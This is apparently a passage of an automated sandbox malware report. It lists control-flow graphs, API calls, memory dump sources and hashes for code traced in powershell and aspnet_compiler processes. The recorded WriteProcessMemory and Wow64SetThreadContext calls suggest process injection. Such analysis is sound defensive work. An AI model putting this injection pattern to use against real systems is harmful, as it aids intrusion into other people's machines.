                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 921 4c39360-4c393ae 923 4c393b0-4c393b6 921->923 924 4c393b8-4c393f1 WriteProcessMemory 921->924 923->924 925 4c393f3-4c393f9 924->925 926 4c393fa-4c3941b 924->926 925->926
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 8ec5807519e35836d5a2090a49e073920e10ca2882b0c38532564e07d2751251
                                                              • Instruction ID: eca99f11c03dd2a49e7e8b8a0faff32aca595b5c605d717742552bfac13c864f
                                                              • Opcode Fuzzy Hash: 8ec5807519e35836d5a2090a49e073920e10ca2882b0c38532564e07d2751251
                                                              • Instruction Fuzzy Hash: D72139B18003499FDB10CF99D984BDEFBF4FB08320F44842AE518A7650D374A544CBA1
                                                              Function 04C37314 Relevance: 1.6, APIs: 1, Instructions: 63injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 928 4c37314-4c393ae 930 4c393b0-4c393b6 928->930 931 4c393b8-4c393f1 WriteProcessMemory 928->931 930->931 932 4c393f3-4c393f9 931->932 933 4c393fa-4c3941b 931->933 932->933
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 744188a4a87aec67ea7b10f98eaa0e54a26e619f224f5eec9e09c3bb396ded2d
                                                              • Instruction ID: 6b48396884351ebe27c130c4c3b41ab55cd1e9c5702955d82eaa3920e139a1be
                                                              • Opcode Fuzzy Hash: 744188a4a87aec67ea7b10f98eaa0e54a26e619f224f5eec9e09c3bb396ded2d
                                                              • Instruction Fuzzy Hash: 6A2107B19003099FDB50CF9AC884BDEBBF4FB48321F54842AE518A7250D378A944CBA5
                                                              Function 04C391E9 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 949 4c391e9-4c39230 951 4c39232-4c3923a 949->951 952 4c3923c-4c39268 Wow64SetThreadContext 949->952 951->952 953 4c39271-4c39292 952->953 954 4c3926a-4c39270 952->954 954->953
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 1eac73df7ca22006a791d2029383ad3c639af2f8181a07399a3e3f23d64d5a6f
                                                              • Instruction ID: 065a3f789dd8efb61e7bd23a1e26a1b765860ac7cbf8feb3d2069950d8c555d4
                                                              • Opcode Fuzzy Hash: 1eac73df7ca22006a791d2029383ad3c639af2f8181a07399a3e3f23d64d5a6f
                                                              • Instruction Fuzzy Hash: 6D1144B2C003499FDB10CFAAC844BDEFBF5AB88320F548029E458A3200D378A545CFA1
                                                              Function 04C372FC Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 935 4c372fc-4c39230 937 4c39232-4c3923a 935->937 938 4c3923c-4c39268 Wow64SetThreadContext 935->938 937->938 939 4c39271-4c39292 938->939 940 4c3926a-4c39270 938->940 940->939
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5fe9b2e3d2cc6c4c144a444501e8952812f107aee66218879d05e6b64b652425
                                                              • Instruction ID: 210aab025e48a60ccf7efb1a242d442317e59e376ad5c07c04d8813a934f7f91
                                                              • Opcode Fuzzy Hash: 5fe9b2e3d2cc6c4c144a444501e8952812f107aee66218879d05e6b64b652425
                                                              • Instruction Fuzzy Hash: 081144B2D007498FDB10CF9AC844BAEFBF5EB88320F148129E418B3600D778A545CFA5
                                                              Function 04C37320 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 942 4c37320-4c39230 944 4c39232-4c3923a 942->944 945 4c3923c-4c39268 Wow64SetThreadContext 942->945 944->945 946 4c39271-4c39292 945->946 947 4c3926a-4c39270 945->947 947->946
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 857e4fcd5d0d2cc8600a369d5b72f2cd7e946c711bb603f15364b589978aeb6d
                                                              • Instruction ID: 4279f2a7e8562df15b785222a115187f7ea4e4853693dc6939066cebac442cb8
                                                              • Opcode Fuzzy Hash: 857e4fcd5d0d2cc8600a369d5b72f2cd7e946c711bb603f15364b589978aeb6d
                                                              • Instruction Fuzzy Hash: D01114B6D006499FDB10CF9AC844BAEFBF5EB88320F158129E419B3701D778A545CFA5
                                                              Function 07B61EF9 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 956 7b61ef9-7b61f3a 959 7b620b7-7b620d5 956->959 960 7b61f40-7b61f45 956->960 966 7b620d7-7b62102 959->966 967 7b62058-7b6205f 959->967 961 7b61f47-7b61f4d 960->961 962 7b61f5d-7b61f69 960->962 963 7b61f51-7b61f5b 961->963 964 7b61f4f 961->964 972 7b62062-7b6206c 962->972 973 7b61f6f-7b61f72 962->973 963->962 964->962 970 7b6225d-7b622a2 966->970 971 7b62108-7b6210d 966->971 987 7b6244c-7b62454 970->987 988 7b622a8-7b622ad 970->988 974 7b62125-7b62129 971->974 975 7b6210f-7b62115 971->975 976 7b6206e-7b62077 972->976 977 7b6207a-7b62080 972->977 973->972 978 7b61f78-7b61f7f 973->978 985 7b6212f-7b62133 974->985 986 7b62208-7b62212 974->986 980 7b62117 975->980 981 7b62119-7b62123 975->981 982 7b62086-7b62092 977->982 983 7b62082-7b62084 977->983 978->959 984 7b61f85-7b61f8a 978->984 980->974 981->974 991 7b62094-7b620b4 982->991 983->991 992 7b61fa2-7b61fa6 984->992 993 7b61f8c-7b61f92 984->993 994 7b62135-7b62146 985->994 995 7b62173 985->995 989 7b62214-7b6221d 986->989 990 7b62220-7b62226 986->990 1026 7b62456-7b6247c 987->1026 1027 7b623f0-7b623f1 987->1027 997 7b622c5-7b622c9 988->997 998 7b622af-7b622b5 988->998 999 7b6222c-7b62238 990->999 1000 7b62228-7b6222a 990->1000 992->972 996 7b61fac-7b61fb0 992->996 1004 7b61f96-7b61fa0 993->1004 1005 7b61f94 993->1005 994->970 1017 7b6214c-7b62151 994->1017 1001 7b62175-7b62177 995->1001 1013 7b61fb2-7b61fce 996->1013 1014 7b61fd0 996->1014 1009 7b623f4-7b623fe 997->1009 1010 7b622cf-7b622d3 997->1010 1007 7b622b7 998->1007 1008 7b622b9-7b622c3 998->1008 1015 7b6223a-7b6225a 999->1015 1000->1015 1001->986 1011 7b6217d-7b62181 1001->1011 1004->992 1005->992 1007->997 1008->997 1021 7b62400-7b62409 1009->1021 1022 7b6240c-7b62412 1009->1022 1018 7b622d5-7b622e6 1010->1018 1019 7b62313 1010->1019 1011->986 1020 7b62187-7b62196 1011->1020 1024 7b61fd2-7b61fd4 1013->1024 1014->1024 1028 7b62153-7b62159 1017->1028 1029 7b62169-7b62171 1017->1029 1018->987 1051 7b622ec-7b622f1 1018->1051 1034 7b62315-7b62317 1019->1034 1052 7b621ae-7b62205 1020->1052 1053 7b62198-7b6219e 1020->1053 1031 7b62414-7b62416 1022->1031 1032 7b62418-7b62424 1022->1032 1024->972 1036 7b61fda-7b61fdd 1024->1036 1037 7b624b5-7b624bf 1026->1037 1038 7b6247e-7b6249b 1026->1038 1042 7b6215d-7b62167 1028->1042 1043 7b6215b 1028->1043 1029->1001 1046 7b62426-7b62449 1031->1046 1032->1046 1034->1009 1047 7b6231d-7b62321 1034->1047 1057 7b61fe7 1036->1057 1040 7b624c1-7b624c5 1037->1040 1041 7b624c8-7b624ce 1037->1041 1068 7b62505-7b6250a 1038->1068 1069 7b6249d-7b624af 1038->1069 1049 7b624d4-7b624e0 1041->1049 1050 7b624d0-7b624d2 1041->1050 1042->1029 1043->1029 1047->1009 1055 7b62327-7b6232b 1047->1055 1059 7b624e2-7b62502 1049->1059 1050->1059 1061 7b622f3-7b622f9 1051->1061 1062 7b62309-7b62311 1051->1062 1063 7b621a2-7b621a4 1053->1063 1064 7b621a0 1053->1064 1055->1009 1067 7b62331-7b62357 1055->1067 1070 7b61fee-7b61ff0 1057->1070 1072 7b622fd-7b62307 1061->1072 1073 7b622fb 1061->1073 1062->1034 1063->1052 1064->1052 1067->1009 1085 7b6235d-7b62361 1067->1085 1068->1069 1069->1037 1074 7b61ff2-7b61ff8 1070->1074 1075 7b62008 1070->1075 1072->1062 1073->1062 1080 7b61ffc-7b61ffe 1074->1080 1081 7b61ffa 1074->1081 1075->967 1080->1075 1081->1075 1086 7b62384 1085->1086 1087 7b62363-7b6236c 1085->1087 1090 7b62387-7b62394 1086->1090 1088 7b62373-7b62380 1087->1088 1089 7b6236e-7b62371 1087->1089 1091 7b62382 1088->1091 1089->1091 1093 7b6239a-7b623ef 1090->1093 1091->1090 1093->1027
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq
                                                              • API String ID: 0-1167855494
                                                              • Opcode ID: ea5e817c1e865ccb835a5c782135ce16e1f896c6cbe4d4c9e0440ae4e05124be
                                                              • Instruction ID: 55a4a22ebaf4e12d0660399810cff9c0c52738bf544db43f79fa3016ce9c253a
                                                              • Opcode Fuzzy Hash: ea5e817c1e865ccb835a5c782135ce16e1f896c6cbe4d4c9e0440ae4e05124be
                                                              • Instruction Fuzzy Hash: 9E21E6F0A0524ADFFB24AF29C5086B57BF1FF95251F0980EAD608CB291D739C984CB91
                                                              Function 033DD01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033451099.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_33dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 299083d1ee6b513f852f477b6b1275a49bf7a488616700567efbf89400b1f83a
                                                              • Instruction ID: 5a846e45becf7a7c74c8ce60cbfa9ed6381a52a284add27f62ef97cc16382e9d
                                                              • Opcode Fuzzy Hash: 299083d1ee6b513f852f477b6b1275a49bf7a488616700567efbf89400b1f83a
                                                              • Instruction Fuzzy Hash: 7D01DF72408344AAE7209A29FCC4B66BF9CEF91325F0CC55AEC080A682C67C9841C6B1
                                                              Function 033DD006 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033451099.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_33dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 007d74bed26460b9a082cfc19aff745375e773fa2b35d0826ce652cedddf906d
                                                              • Instruction ID: 72b3deab3bb829f9dba1e0370b8a1e647de81ed199e3fb25ec9ccecd838dbe4d
                                                              • Opcode Fuzzy Hash: 007d74bed26460b9a082cfc19aff745375e773fa2b35d0826ce652cedddf906d
                                                              • Instruction Fuzzy Hash: 67015E6240E3C09EE7128B259C94B52BFA8DF53224F1DC1DBD8888F293C2699844C7B2

                                                              Non-executed Functions

                                                              Function 04C37FE4 Relevance: 3.1, Strings: 2, Instructions: 612COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xhq$$dq
                                                              • API String ID: 0-4001282582
                                                              • Opcode ID: f7e535352b7a40e619cb4701787d0423f3cc4bca33eb32754870c1224beaa4ef
                                                              • Instruction ID: 96b364a01f0a99281d954210af4e65afaa8b78056497cfd63846ef91f5838746
                                                              • Opcode Fuzzy Hash: f7e535352b7a40e619cb4701787d0423f3cc4bca33eb32754870c1224beaa4ef
                                                              • Instruction Fuzzy Hash: C1918F74B002189BDB08EB75985477E7BA7FBC8741F19C52AE406E7284DE39DC0397A1
                                                              Function 04C34A77 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a08d0e4c0ab76e9ab19c1179b7261610bf4156780daaf6e274e3ed524a22c961
                                                              • Instruction ID: 8082d7703c73d6aeb89bda4138f8ead9935066d88facbe068fa691f23cc924cc
                                                              • Opcode Fuzzy Hash: a08d0e4c0ab76e9ab19c1179b7261610bf4156780daaf6e274e3ed524a22c961
                                                              • Instruction Fuzzy Hash: E041355685F3E22EDB036B3C68B00D67FB08E6365975E15C7C1D4CE0A3E508496ED3AA
                                                              Function 04C3565D Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af3feffbdc2f3629ed8a68dcd66f8b19f5515824c6164686b9910670a3df3400
                                                              • Instruction ID: 06f4e61d82cd9ed28c2560d621e65beca547654a06840a5475bba29f712b7f8c
                                                              • Opcode Fuzzy Hash: af3feffbdc2f3629ed8a68dcd66f8b19f5515824c6164686b9910670a3df3400
                                                              • Instruction Fuzzy Hash: 7C314E5285F3E22EDB436B3858B00D67FB08E63619B1A04C3C1D4CF0A3E508595ED7AB
                                                              Function 07B600F0 Relevance: 9.0, Strings: 7, Instructions: 244COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq
                                                              • API String ID: 0-716821188
                                                              • Opcode ID: 375a140aa2743fe6792718f5d97900b478291f03cb12a0d5aaec522b90939c24
                                                              • Instruction ID: b94d0567ab16a37a14bad63cd4c086b51603038742fb87721fbdadea2745f3d5
                                                              • Opcode Fuzzy Hash: 375a140aa2743fe6792718f5d97900b478291f03cb12a0d5aaec522b90939c24
                                                              • Instruction Fuzzy Hash: B081EAF1B042068FEB14AE6AD548B6AB7F6FF89211F1484FADA09CB241EB35C941C751
                                                              Function 07B60669 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq
                                                              • API String ID: 0-4229963660
                                                              • Opcode ID: 7a3ca4d8a5ec0c67a066851a042158e21049ea01cd8efc35d425db562754a70f
                                                              • Instruction ID: d20115208408869a5700066c2fa566e43ddc1bcbc72e9182b6c6ff9e9eaf6700
                                                              • Opcode Fuzzy Hash: 7a3ca4d8a5ec0c67a066851a042158e21049ea01cd8efc35d425db562754a70f
                                                              • Instruction Fuzzy Hash: 660126E270A3854FDB2661692C3466A6F729BD271072940DBC541CB3C2CD184E45C7A3

                                                              Execution Graph

                                                              Execution Coverage:0.9%
                                                              Dynamic/Decrypted Code Coverage:5.6%
                                                              Signature Coverage:8.9%
                                                              Total number of Nodes:124
                                                              Total number of Limit Nodes:13
                                                              execution_graph 88435 424243 88436 42425f 88435->88436 88437 424287 88436->88437 88438 42429b 88436->88438 88440 42bda3 NtClose 88437->88440 88445 42bda3 88438->88445 88442 424290 88440->88442 88441 4242a4 88448 42def3 RtlAllocateHeap 88441->88448 88444 4242af 88446 42bdc0 88445->88446 88447 42bdce NtClose 88446->88447 88447->88441 88448->88444 88537 4245d3 88538 4245ec 88537->88538 88539 424637 88538->88539 88542 424677 88538->88542 88544 42467c 88538->88544 88540 42ddd3 RtlFreeHeap 88539->88540 88541 424647 88540->88541 88543 42ddd3 RtlFreeHeap 88542->88543 88543->88544 88545 42ef93 88546 42efa3 88545->88546 88547 42efa9 88545->88547 88550 42deb3 88547->88550 88549 42efcf 88553 42c0a3 88550->88553 88552 42dece 88552->88549 88554 42c0bd 88553->88554 88555 42c0cb RtlAllocateHeap 88554->88555 88555->88552 88556 42b413 88557 42b42d 88556->88557 88560 1a22df0 LdrInitializeThunk 88557->88560 88558 42b452 88560->88558 88449 417063 88450 417087 88449->88450 88451 4170c3 LdrLoadDll 88450->88451 88452 41708e 88450->88452 88451->88452 88453 413583 88457 4135a3 88453->88457 88455 41360c 88456 413602 88457->88455 88458 41aca3 RtlFreeHeap LdrInitializeThunk 88457->88458 88458->88456 88459 1a22b60 LdrInitializeThunk 88460 4133a3 88463 42c013 88460->88463 88464 42c030 88463->88464 88467 1a22c70 LdrInitializeThunk 88464->88467 88465 4133c2 88467->88465 88561 41dd53 88562 41dd79 88561->88562 88566 41de70 88562->88566 88567 42f0c3 88562->88567 88564 41de11 88565 42b463 LdrInitializeThunk 88564->88565 88564->88566 88565->88566 88568 42f033 88567->88568 88569 42deb3 RtlAllocateHeap 88568->88569 88570 42f090 88568->88570 88571 42f06d 88569->88571 88570->88564 88572 42ddd3 RtlFreeHeap 88571->88572 88572->88570 88573 423d96 88574 423d9c 88573->88574 88575 423e23 88574->88575 88576 423e38 88574->88576 88577 42bda3 NtClose 88575->88577 88578 42bda3 NtClose 88576->88578 88579 423e2c 88577->88579 88581 423e41 88578->88581 88580 423e78 88581->88580 88582 42ddd3 RtlFreeHeap 88581->88582 88583 423e6c 88582->88583 88468 401ae8 88469 401afe 88468->88469 88472 42f463 88469->88472 88475 42d993 88472->88475 88476 42d9b9 88475->88476 88485 407263 88476->88485 88478 42d9cf 88484 401b72 88478->88484 88488 41a993 88478->88488 88480 42d9ee 88481 42c123 ExitProcess 88480->88481 88482 42da03 88480->88482 88481->88482 88499 42c123 88482->88499 88502 415d33 88485->88502 88487 407270 88487->88478 88489 41a9bf 88488->88489 88526 41a883 88489->88526 88492 41aa04 88496 42bda3 NtClose 88492->88496 88497 41aa20 88492->88497 88493 41a9ec 88494 41a9f7 88493->88494 88495 42bda3 NtClose 88493->88495 88494->88480 88495->88494 88498 41aa16 88496->88498 88497->88480 88498->88480 88500 42c140 88499->88500 88501 42c14e ExitProcess 88500->88501 88501->88484 88503 415d4d 88502->88503 88505 415d63 88503->88505 88506 42c7a3 88503->88506 88505->88487 88508 42c7bd 88506->88508 88507 42c7ec 88507->88505 88508->88507 88513 42b463 88508->88513 88514 42b47d 88513->88514 88520 1a22c0a 88514->88520 88515 42b4a6 88517 42ddd3 88515->88517 88523 42c0e3 88517->88523 88519 42c859 88519->88505 88521 1a22c11 88520->88521 88522 1a22c1f LdrInitializeThunk 88520->88522 88521->88515 88522->88515 88524 42c0fd 88523->88524 88525 42c10b RtlFreeHeap 88524->88525 88525->88519 88527 41a89d 88526->88527 88531 41a979 88526->88531 88532 42b4f3 88527->88532 88530 42bda3 NtClose 88530->88531 88531->88492 88531->88493 88533 42b50d 88532->88533 88536 1a235c0 LdrInitializeThunk 88533->88536 88534 41a96d 88534->88530 88536->88534 88584 42455c 88585 424562 88584->88585 88586 42bda3 NtClose 88585->88586 88587 424567 88585->88587 88588 42458c 88586->88588

                                                              Executed Functions

                                                              Function 00417063 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 417063-41708c call 42ead3 27 417092-4170a0 call 42f0d3 24->27 28 41708e-417091 24->28 31 4170b0-4170c1 call 42d463 27->31 32 4170a2-4170ad call 42f373 27->32 37 4170c3-4170d7 LdrLoadDll 31->37 38 4170da-4170dd 31->38 32->31 37->38
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004170D5
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                              • Instruction ID: d2bdfe92a6df6b11a72e1f8b55d3ed58340993e138cd653c837ef381cf487159
                                                              • Opcode Fuzzy Hash: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                              • Instruction Fuzzy Hash: 000171B5E0020DBBDF10DBE1DC42FDEB778AB14308F0081AAE90897241F675EB488B95
                                                              Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 49 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                              • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4
                                                              Function 01A22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 63 1a22b60-1a22b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                              • Instruction ID: 27db5ababc355a92d83e824708e19b4265f1b49a1603201a947dbf5172090a6a
                                                              • Opcode Fuzzy Hash: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                              • Instruction Fuzzy Hash: 0690026160240003410571584414716401A97E0201F56C121F1018590DC52989927225
                                                              Function 01A22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 1a22df0-1a22dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                              • Instruction ID: d40e5ee7e6567211ce72c3aa3f8f2c7671f41eb231b616248e0bec625adc96e5
                                                              • Opcode Fuzzy Hash: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                              • Instruction Fuzzy Hash: 4090023160140413D11171584504707001997D0241F96C512B0428558DD65A8A53B221
                                                              Function 01A22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 64 1a22c70-1a22c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                              • Instruction ID: a7af68e280d3668a7584b7941adeffe58d976fd3bf3b5a4b0198f80521615792
                                                              • Opcode Fuzzy Hash: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                              • Instruction Fuzzy Hash: 1690023160148802D1107158840474A001597D0301F5AC511B4428658DC69989927221
                                                              Function 01A235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 66 1a235c0-1a235cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
